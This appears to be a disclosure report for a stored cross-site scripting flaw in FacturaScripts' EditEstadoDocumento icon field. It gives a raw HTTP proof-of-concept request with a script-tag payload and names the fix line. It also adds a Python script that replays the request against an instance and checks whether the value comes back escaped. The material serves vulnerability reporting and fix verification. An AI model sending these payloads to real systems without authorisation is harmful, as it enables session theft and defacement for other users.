Stored XSS in EditEstadoDocumento in neorazorx/facturascripts
Reported on Jun 21st 2022
Description
In facturascripts/EditEstadoDocumento, the Icon field (form parameter icon) accepts an XSS payload. The value is saved with the document state and rendered back into the page without HTML escaping, so the injected script runs in the browser of anyone who views it.
Proof of Concept
Raw HTTP request sent from a logged-in session; the payload is carried in the icon form field:
POST /facturascripts/EditEstadoDocumento?code=27&action=save-ok HTTP/1.1
Host: 127.0.0.1
Content-Length: 1224
Cache-Control: max-age=0
sec-ch-ua: "-Not.A/Brand";v="8", "Chromium";v="102"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryyI8BCGNBzwLmaAy8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/facturascripts/EditEstadoDocumento?code=26&action=save-ok
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: fsNick=admin; fsLogkey=hMNEoHuTcDfqZY9OK5b8tG7SW4pUliLFrQkdaBxjCzmJR6gXPnAse2I0Vwy13v; fsLang=en_EN; fsCompany=1; MANTIS_STRING_COOKIE=074c946191216c6d308b8d38e9569cfdef504077558ca4e138964772efb3b87f; MANTIS_PROJECT_COOKIE=0; ucp_tabs=2; __stripe_mid=31234598-f1c7-427c-b5cd-9312a98b0b98b9519b; cookie_token=1c39db291b76e38db9e55ed6f02a77b65ae952140787ee0282a0f7880a7935ca; cpg16x_data=YTo2OntzOjI6IklEIjtzOjMyOiI0MmNlNzEwM2M5OTM5NDNjYTIwMDM2YmRkYmM2NTMxOSI7czoyOiJhbSI7aTowO3M6NDoibGFuZyI7czoxMDoiY2hpbmVzZV9nYiI7czo2OiJzZWFyY2giO2E6Mjp7czo2OiJwYXJhbXMiO2E6Njp7czo4OiJrZXl3b3JkcyI7czoyOiJvbiI7czo1OiJ0aXRsZSI7czoyOiJvbiI7czo3OiJjYXB0aW9uIjtzOjI6Im9uIjtzOjQ6InR5cGUiO3M6MzoiQU5EIjtzOjEwOiJuZXdlcl90aGFuIjtzOjA6IiI7czoxMDoib2xkZXJfdGhhbiI7czowOiIiO31zOjY6InNlYXJjaCI7czozOiJzdmciO31zOjM6ImxpdiI7YToxOntpOjA7czoyOiI4NSI7fXM6MTM6InVwbG9hZF9tZXRob2QiO3M6MTA6InVwbG9hZF9zZ2wiO30%3D; elggperm=zG9jJWU92GZ03ft0yoDFuZ0zhBSb9YvA; Elgg=eftlmmmmdr4oamet41e1le100e
Connection: close

------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="action"

insert
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="activetab"

EditEstadoDocumento
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="code"


------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="multireqtoken"

5ebd6335e1917c1e3191a32f6b4be8fd9a5d8c71|1VDJp6
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="idestado"


------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="nombre"

33
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="tipodoc"

PresupuestoCliente
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="actualizastock"

33
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="generadoc"


------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="icon"

'"><script>alert(/xss/);</script><'"2
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="editable"

TRUE
------WebKitFormBoundaryyI8BCGNBzwLmaAy8--
Impact
A payload stored in the icon field executes in the browser of every user who opens a page that renders that document state. An attacker who can reach EditEstadoDocumento (the PoC uses an admin session) can therefore deface pages, act with or steal the sessions of other users, and run arbitrary script in their browsers.
Occurrences
EstadoDocumento.php L141
$this->icon = $this->toolBox()->utils()->noHtml($this->icon);
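The following Python script is an added example and is not part of this report or of FacturaScripts. It builds the same multipart body as the PoC with the payload in the icon field, and classifies a returned page as rendering the stored value verbatim (vulnerable) or HTML-escaped (what the noHtml() call above achieves). The render_icon helper is a hypothetical stand-in for the project's template and assumes the icon is emitted as a CSS class on an <i> tag; the base URL, session cookie and multireqtoken passed to submit_and_check are likewise assumptions to be replaced with values from a test instance.

```python
"""Exercise the EditEstadoDocumento `icon` field for stored XSS.

Added example, not FacturaScripts code. Assumes a reachable FacturaScripts
install, a logged-in session (fsNick/fsLogkey cookies) and a current
multireqtoken copied from the form. render_icon() is a hypothetical stand-in
for the template, not the project's real rendering.
"""
import html
import re
import urllib.request
from typing import Dict, List, Tuple

PAYLOAD = '\'"><script>alert(/xss/);</script><\'"2'   # marker from the report's PoC
BOUNDARY = "----PoCBoundary7e4b1c"                     # arbitrary, absent from all values


def build_multipart(fields: Dict[str, str], boundary: str = BOUNDARY) -> Tuple[bytes, str]:
    """Encode form fields as multipart/form-data, the shape the PoC request uses."""
    parts: List[str] = []
    for name, value in fields.items():
        parts.append(
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{name}"\r\n\r\n'
            f"{value}\r\n"
        )
    body = "".join(parts) + f"--{boundary}--\r\n"
    return body.encode("utf-8"), f"multipart/form-data; boundary={boundary}"


def estado_fields(payload: str, multireqtoken: str) -> Dict[str, str]:
    """The form fields from the report's PoC, with the payload placed in `icon`."""
    return {
        "action": "insert",
        "activetab": "EditEstadoDocumento",
        "code": "",
        "multireqtoken": multireqtoken,
        "idestado": "",
        "nombre": "33",
        "tipodoc": "PresupuestoCliente",
        "actualizastock": "33",
        "generadoc": "",
        "icon": payload,
        "editable": "TRUE",
    }


def render_icon(icon: str, sanitize: bool) -> str:
    """Hypothetical template: the stored icon emitted as a CSS class (assumption).

    sanitize=False echoes the stored value verbatim (the vulnerable behaviour);
    sanitize=True passes it through an HTML escaper, as the fix's noHtml() does.
    """
    value = html.escape(icon, quote=True) if sanitize else icon
    return f'<i class="{value}"></i>'


def classify_reflection(page: str, payload: str) -> str:
    """How the stored value came back: 'unescaped' (XSS), 'escaped', or 'absent'.

    Escapers encode quotes differently (&#39;, &#x27;, &quot;), so the decision
    is made on the tag-bearing core of the payload, where < and > determine
    whether the browser sees markup at all.
    """
    if payload in page:
        return "unescaped"
    core = re.search(r"<[^>]+>.*?</[^>]+>", payload)   # "<script>alert(/xss/);</script>"
    if core is None:
        return "absent"
    if core.group(0) in page:
        return "unescaped"
    if html.escape(core.group(0), quote=False) in page:
        return "escaped"
    return "absent"


def submit_and_check(base_url: str, cookie: str, multireqtoken: str,
                     payload: str = PAYLOAD) -> str:
    """Send the PoC POST and classify how `icon` is rendered in the response.

    base_url, cookie and multireqtoken are assumptions: copy them from a
    logged-in session on a test instance, e.g. http://127.0.0.1/facturascripts.
    """
    body, content_type = build_multipart(estado_fields(payload, multireqtoken))
    post = urllib.request.Request(
        f"{base_url}/EditEstadoDocumento?action=save-ok",
        data=body, method="POST",
        headers={"Content-Type": content_type, "Cookie": cookie},
    )
    with urllib.request.urlopen(post) as resp:   # follows the post-save redirect, if any
        page = resp.read().decode("utf-8", "replace")
    return classify_reflection(page, payload)
```

Against a live instance, a result of "unescaped" from submit_and_check reproduces the finding; "escaped" is what a build containing the noHtml() call should return, since the angle brackets of the script tag arrive as &lt; and &gt; and the browser treats the value as text.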
@iohehe - we can proceed with a CVE if the maintainer is happy to do so :)